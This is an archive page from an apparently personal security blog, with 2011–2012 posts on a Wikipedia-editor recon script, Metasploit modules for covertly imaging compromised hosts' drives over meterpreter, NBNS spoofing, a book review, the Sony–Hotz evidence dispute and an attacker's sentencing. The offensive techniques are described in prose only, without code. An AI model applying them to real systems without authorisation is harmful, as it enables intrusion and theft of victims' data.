Who Added What on Wikipedia?

 analysis, python, recon  No Responses »
Jan 122012
 

Wikipedia articles carry with them a revision history that logs every change made to an article, as well as information on the user or IP address that made the change. The revision history and user information can provide someone gathering intelligence with as much or more information about a topic than its article. Many Wikipedia editors are personally connected to the articles they edit, or otherwise have a stake in what is being said, and by processing the revision data, it’s possible to gain some insight into those connections.

This is somewhat awkward and time consuming to do through the web interface, so it helps to automate. I had a need to determine what revisions and users introduced certain phrases in an article, and wrote the following script to help:

To use, first export the article(s) you want to process to XML using Wikipedia’s Special:Export page (be sure to uncheck ”Include only the current revision”). Once you have the XML saved locally, usage is as follows:

./wikiadded.py <xml file> <word or phrase>

The output is comma-delimited and contains the Wikipedia timestamp, user information (username/id or IP address), and a link to the revision that introduced (or re-introduced) the phrase.

Hope this is of use to someone besides myself!

 Posted by wesley at 2:41 am

New Design and Upcoming Book Reviews

 book review  No Responses »
Jan 112012
 

Today, while updating this VPS, I took the opportunity to change the style/design of mcgrewsecurity.com. I’m especially proud of the new logo. It’s a combination of several out-of-copyright book scans, and my co-worker Kendall’s keen observation that the bit of the key looked like an RJ-45 Ethernet port. A bit of work later and now it very much looks like one.

Over the past several months, No Starch Press has been kind enough to send along review copies of several of their recent security-related book releases. Soon you’ll start seeing my reviews being posted. Overall, I can say I’m very impressed.

 Posted by wesley at 8:55 pm

Defcon/Blackhat Slides, Whitepaper, Tools

 blackhat, defcon, forensics  5 Responses »
Aug 092011
 

I apologize to those in my talk (and throughout the rest of the cons last week) that asked about availability of the tools I describe in my talk. I stated that they should’ve been in the Metasploit trunk on the day of my Black Hat USA talk this past Wednesday, backed by assurances from Rapid7 that it would be there. Apparently I was talking to someone at Rapid7 that was unable to make those assurances, so it looks like I’ll be starting over the process of getting it available in the main distribution today. Edit: It’s in now.  If you svn update metasploit, enum_drives and imager will be in “modules/post/windows/gather” and nbd_server will be in “modules/post/windows/manage”.

In the meantime, you can drop the following files into your own copy of Metasploit to use the tools introduced in my talk today:

  • enum_drives.rb – Enumerates physical disks and logical volumes for use in the other two modules
  • imager.rb – Images physical/logical drives over a meterpreter shell. Options are similar to those that forensics folk use in dd
  • nbd_server.rb – Maps a remote physical/logical drive to a local network block device server.  You can then mount and/or use any forensics tools you’d like on it.

Also, here are the final slides as I presented them, and the whitepaper that I originally submitted with my talk proposal:

Video of both the Black Hat USA and DefCon versions of the talk will be available at some point.

 Posted by wesley at 7:58 am

McGrew Security at Black Hat USA 2011 and DEFCON 19

 blackhat, defcon, forensics  2 Responses »
Aug 012011
 

This is just a quick post to remind readers that I will be in Vegas for Black Hat and DEFCON this week, and I’m looking forward to meeting as many of you as possible. I will be giving a talk at both Black Hat and DEFCON:

  • Wednesday, August 3rd, 3:15 PM – Black Hat USA 2011 – Track 7
  • Friday, August 5th, 3:00 PM – DEFCON 19 – Track 2

My talk is entitled “Covert Post-Exploitation Forensics With Metasploit”, and I’ll be talking about a set of Metasploit Post-modules that I have developed for performing forensic analysis of machines over a meterpreter connection. With these modules, penetration testers (as well as other roles) will be able to run currently-available/popular forensic tools on remote drives in the same way that forensic examiners currently use them on local drives. Through some protocol trickery and using Railgun to pipe the Windows API over meterpreter, you can essentially make a local block device that maps to the victim’s. I’ll have some discussion, including a basic introduction to disk/file-system forensics for penetration testers, a demo, and some time for questions and discussion.

The presentation and tools will be available on the disc, as well as “latest” versions on here as soon as I can manage to put them on here after my talk. The modules ought to be available in the Metasploit SVN soon as well.

I’ll also be actively attending/prowling around the conference, so feel free to track me down to talk shop about breaking things, forensics, etc. I have lots of fun stories that aren’t appropriate for the blog/twitter.

Edit:

I will also be bringing 20 of the challenge coins we normally hand out at the end of the Advanced Forensics class at the Mississippi State University National Forensics Training Center. If you want one, track me down at Black Hat or DEFCON and offer me something cool/interesting for one ;) :

Double Secret Edit:

I also have fun 0-day for Tiny Tower on all IOS devices (iPhone, iPad, iPod Touch), which I will disclose to attendees for the price of one drink and a handshake Non-Disclosure Agreement (negotiable). You’re not going to be hacking the Gibson with this one anytime soon, but it’s *fun*.

 Posted by wesley at 8:47 am

Book Review: BackTrack 4: Assuring Security by Penetration Testing

 book review  10 Responses »
Jul 022011
 

I’ve put off doing this review for too long.  I was sent this book close to its release date, and made quick work of reading through it and making notes for the review. As you’ll see in this post, I don’t think much of it, and I wasn’t looking forward to making such a negative post about it. I would just let it slide, as I prefer to post reviews of books that I like and recommend at least to some extent, but Packt Publishing are heavily promoting this book and I’ve seen several people I know purchase or consider purchasing it. For that reason, I feel like it’s a good idea to warn the target audience of this blog away from it.

At a first glance, it’s easy to be skeptical of this book due to the fact that it had the misfortune of being a Backtrack 4 book published at almost the exact time Backtrack 5 came out. This doesn’t bother me so much. If it were written well, it could easily make up for any differences in the details between versions. Unfortunately, being dated is the least of this book’s problems.

The vast majority of the book is padded with a grocery list of what appears to be each and every tool in the Backtrack distribution. Comprehensive coverage is fine, though each tool is only given the very briefest of coverage, with almost no coverage or consideration to educating the reader on how the tools work or the background needed to effectively use them. New terms and concepts are thrown at the user relentlessly without introduction or explanation. This book falls into a useless “middle” state where a beginning user would be better served by a book that gives more depth of coverage for a handful of tools (see Web Application Hacker’s Handbook), while still failing to serve an advanced user that could find the same information quickly in a man page. The book falls well short of its goal of serving as a “single professional, practical, and expert guide to develop hardcore penetration testing skills from scratch”.

There are many instances of wasted space in the book as well. A straight copy-paste of /etc/services is the worst offender. The text doesn’t exactly live up to the promises of its table of contents either. A segment on “Writing exploit modules” simply takes the reader through the source code of an existing metasploit module, with only the barest of commentary that makes one wonder if the authors understand how it works, much less whether or not the reader will be able to write one (or even read one) in practice.

Aside from the “list of things” approach that takes up the majority of the book, there is a fair amount of text about the penetration testing process that, if executed properly, would make an excellent introduction to newcomers. Unfortunately, it’s written as though the authors intentionally wanted it to be impenetrable and difficult to understand. The following sentence is a representative example:

Since the exponential growth of an IT security industry, there are always an intensive number of diversities found in understanding and practicing the correct terminology for security assessment.

Some of it’s just plain wrong. A set of paragraphs equate “black hat” hacking with “black box” testing, and goes on the state the same about “white” and “grey”. It’s difficult to imagine that anyone in penetration testing believes that. The authors take the reader through overwrought descriptions of various testing “methodologies” (the OWASP top ten is not a methodology), and then throw them out in favor of an over-simplified “Backtrack Testing Methodology” that appears to be a simple depth-first traversal of the BT4 menu options.

While it may be tempting to buy this book as a quick reference or summary of all of the tools, I would not encourage it. I would strongly discourage anyone thinking to start out, or get up to speed in penetration testing from buying this book. It’ll just frustrate you. For more experienced readers, there are books that are far more worthy of your time and money.

 Posted by wesley at 12:20 pm

Fake Bin Laden Death Pics/Videos Probably on the Way

 malware  2 Responses »
May 012011
 

Just a quick note to readers in security roles that might be responsible for end-user actions: Tonight’s announcement that Osama Bin Laden has been killed will likely spawn a large number of malware purporting to be videos or pictures of the body or operation. You may want to pre-empt this by reminding users of the dangers of clicking and running things from untrusted sources.

I think most of the readers of this blog are smart enough not to fall for this themselves (and might even seek it out for the malware samples!), and that a good percentage are in offensive security roles, but this could be a big problem for the readers in defensive roles. So, heads up!

 Posted by wesley at 10:08 pm

Speaking at Black Hat USA 2011

 blackhat, forensics  16 Responses »
Apr 192011
 

The reviewers at Black Hat have notified me that my submission has been accepted and I will be speaking at BlackHat USA 2011 in Las Vegas this year. As you can imagine, I’m thrilled, as I was not able to attend BlackHat or Defcon last year. I’m looking forward to being there as a speaker this time, interacting with all the great folks I met two years ago there, and anyone new I meet.

The title of my talk is “Covert Post-Exploitation Forensics With Metasploit”, which will be accompanied by the release of a set of meterpreter scripts and a white-paper that details how they can be used. The abstract of my work has been posted on the Briefings page at the USA 2011 site:

In digital forensics, most examinations take place after the hardware has been physically seized (in most law enforcement scenarios) or a preinstalled agent allows access (in the case of enterprise forensics packages). These scenarios imply that the”subject” (the one in possession of the media) is aware of the fact that their data has been seized or subject to remote access. While penetration testing tools allow for surface-level access to the target filesystem, there is a lot of potential data that is being missed in unallocated space that could be accessed by file system forensic tools such The Sleuth Kit.

 

In this presentation, Wesley will present a new set of tools that will allow forensic examiners and pentesters alike to image remote filesystems of compromised systems, or perform examinations directly on remote filesystem with forensic tools on the attacking machine by mapping remote drives to local block devices. This is the integration of Metasploit with a large body of existing digital forensic tools.

The associated scripts and more information will be released with the conference proceedings, and here on this site at the time of my talk (probably also a coordinated release into the Metasploit trunk, but I haven’t talked to those guys about it yet.).

At this point, you’ll have to take my word for it, but I assure you this isn’t a typical “Yet Another Metasploit Talk”. I would hope that the submission reviewers at Black Hat would not have accepted it if they felt this was the case. What I’m demonstrating is a way to use a whole suite of useful and mature tools in a penetration test (or other scenario) through Metasploit.

Assuming I’m not scheduled to present at the same time as Barnaby Jack, Dan Kaminsky, or the like, I’d definitely recommend showing up, as I think it’ll be a very fun talk and demonstration. See you at Caesars Palace!

 Posted by wesley at 2:19 pm

NBNS Spoofing in Metasploit

 exploitation, links, network, pentesting, vulnerabilities  5 Responses »
Mar 312011
 

Tim Medin, over at the excellent Packetstan blog, just wrote up an excellent post detailing the implementation of a NBNS spoofing module which has been added to the the latest Metasploit trunk:

This module is based off an old tool, nbnspoof.py, that I wrote to perform this attack, originally described (as nearly as I can tell) by Sumit Siddharth. It’s a very simple attack, taking advantage of the way Windows proceeds to NetBIOS Name Service lookups once local and DNS lookups fail. If you’ve ever turned a careful eye to broadcast traffic on any network with Windows systems, you’ve probably noticed that a surprising number of lookups fail through to NBNS for various reasons.

Tim does a great job of describing how the spoofing works, how to use it in the context of a penetration test, and how the module was developed. Due to its integration into the current version of the Metasploit framework, I’d have to say that I recommend it over the original python version. Maybe one day soon I’ll one-up him and try to turn it into a meterpreter post-exploitation script, in order to hijack remote hosts into being spoofers ;-) .

Until then, and in related news, I’ve submitted a talk on some other forms of Metasploit sorcery that I have developed recently to Defcon (and tomorrow to Blackhat once the CFP opens). With any luck I’ll be speaking at one or the other later this year. Either way, I’ll see some of my readers there, hopefully!

 Posted by wesley at 6:52 pm

Geohot Antagonizing Sony's Forensic Examiners?

 forensics  10 Responses »
Mar 232011
 

EDIT: I have found some clarification about the “controller cards”, seemingly confirming what I have posted, and have added thoughts to the end of this post

Today, on the Wired Threat Level blog, there is a story that covers Sony’s allegations that George Hotz (“geohot”), who they are suing for DMCA violations involving a PlayStation 3 jailbreak, sabotaged hard drives provided for discovery, and skipped town.

Skipping town to South America is not in my area of expertise, so I’m not commenting on whether or not that is happening, but forensic acquisition and analysis of hard drives happens to be my current bread-and-butter. The Wired article states that, regarding the hard drives, Sony claims that Hotz provided the hard drives in a non-functional state. This includes a link to a PDF from the case’s filings which includes the exact wording of Sony’s complaint on page 22:

Despite Judge Spero’s orders, Hotz continues to frustrate all attempts to complete jurisdictional discovery.  In yet another attempt to avoid his deposition and a limited inspection of his impounded hard drives, on March 17, 2011, Hotz filed a motion for protective order on issues already decided by Judge Spero.  (Docket No. 100.)  On the same day, TIG discovered that prior to delivery, Hotz had removed integral components from his impounded hard drives, rendering them completely non-functional.  Bricker Decl., ¶21, Exh. S.  When SCEA echoed TIG’s request that the components of the hard drives be delivered immediately, Hotz’s counsel responded that Hotz was in South America.

Hotz’s attorney’s quote to Wired in response to this was the following:

They didn’t have the controller card attached. That’s it

The attorney, I assume, does not have an extensive technical background, and likely gave this comment off the cuff (or as “off the cuff” as any attorney will allow themselves to be). Therefore, this is going to take some interpretation. The first question is what do they mean by “controller card”. When it comes to hard drives, two things come to my mind:

  • The interface between the chipset of the motherboard and the hard drive. For most motherboards the SATA or IDE interface is integrated into the board. If it’s an older computer that an end-user has added a SATA drive to, a SATA “controller card”, in the literal “card” sense, may be slotted into the motherboard to interface with the newer drive.
  • The circuit board attached to the drive that handles ATA commmunications on one side, and interacts with drive’s electrical and mechanical internals on the other side. To illustrate, it’s the part facing the camera in this image:

The Underside of a Hard Drive

The latter is what I assume is meant, for the following reasons:

  • It’s something that could be removed from a drive, as the filing states
  • Controller cards in the sense of a slotted card on a motherboard aren’t very common right now. Most computers have the interface they need on the motherboard.
  • Even if it was a SATA, IDE, or even SCSI controller card meant to be slotted into a motherboard, not providing this card would not render the drive unreadable to a well-outfitted forensics lab that TIG (the third party forensic examiner Sony is using) would have.

Now, I do not support Sony’s lawsuit against George Hotz, but it seems to me that if he did remove those controller boards from the drives, this is a case of needlessly antagonizing the opposing counsel, examiners, and the judge. I really don’t think it’s a good idea to intentionally do this when providing evidence under a court order.

Those boards don’t just fall off, and the absence of them is not something that is as easy to overcome as Hotz’s attorney implies. To read a drive that has had this board removed, you would need an identical board. Those who do data recovery in cases where this board has been damaged know that extreme care needs to be taken in finding a replacement. Even drives of the same model and capacity can have different revisions of these boards, and it’s crucial to get a match. Even a forensics firm such as TIG is not likely to maintain a stockpile of various controller boards from drives, as it would be prohibitively expensive to buy and file “one of everything”. The absence of the board (not just the failure of it) makes it even more difficult, as it may or may not be possible to determine the right revision of the board to use to replace it, without the original to compare.

While I disagree with the basis of the lawsuit and support the opening of electronic devices (all of my and my spouse’s Apple iPods, iPhones, and iPads are jailbroken), if this is the method being used to stall the plaintiff and case progress, I see that as being in bad form for Hotz, and a bigger issue than his attorney lets on. Hopefully not. Don’t make it hard for me to like you, geohot! Take the high road.

EDIT: I found the exhibit with the discussion of the missing hard drive parts at Groklaw:

This pretty much confirms the above with the following quotes from an examiner at TIG:

This controller card is  installed at the factory and not normally removed or handled by an end user.

We took the drives out of our evidence locker and the evidence bag to image them in their current encrypted state as stated in the order and agreed to on our phone call yesterday.   We have determined that the controller cards which are screwed onto the hard drives were removed prior to them being given to us.   Therefore we are unable to operate the hard drives in their current state.  Keep in mind that we need two days to image these drives as we have to image two 1TB drives.

It’s difficult to imagine a reason Hotz would have had to remove the circuit boards from the drives he was ordered to turn over. It will be very interesting to see why he did this. From my position, I can’t see this as being productive for anything other than antagonizing the opposing party and, more importantly, the judge.

 Posted by wesley at 5:08 pm

GhostExodus Sentenced to 9 years, 2 months

 SCADA, skiddies  21 Responses »
Mar 182011
 

Jesse William McGraw, who pleaded guilty to two counts of transmitting malicious code to systems at the hospital at which he worked (including a SCADA HVAC system’s HMI), was sentenced yesterday at the U.S. District Court for Northern Texas to 110 month of custody, followed by three years of supervised release. He has also been ordered to pay restitution in the amount of $31,881.75. This is according to the latest filing on his case on PACER:

He was facing a maximum of 10 years per count, which is higher than the usual 5 years per count due to the threat to public health and safety. At one point in the case last year, he had signed a plea agreement stating that he would plead guilty in exchange for a maximum sentence of 6 years. This fell through, however, when he reneged on the deal by pleading innocent on his next appearance in court. He was then re-indicted for 14 counts, which were dropped after he agreed to (and did) plead guilty to the original two counts, outside the scope of any agreement.

On a personal note, I feel that this is a fair sentence considering the circumstances. His actions jeopardized the safety of innocent people and attempted to destroy evidence and hinder the investigation after he was taken into custody. Even after he finally pleaded guilty, he continued to blame everyone but himself, as you can see in his “cross-site scripting tunneling” story he posted, or had someone post for him, from prison three months ago.  I originally felt very sorry for him, though it’s hard to have any sympathy for someone that has continually acted against his own best interests as long as he has.

The rest of the “Electronik Tribulation Army” have gone relatively quiet. Maybe this will be a wakeup call for them to get out of this game.

UPDATE: A good post on this from the folks at the Dallas Observer:

If you’re new to the site, these are the previous posts this is a followup to:

 Posted by wesley at 4:27 pm
 Older Entries
© 2012 McGrew Security Suffusion theme by Sayontan Sinha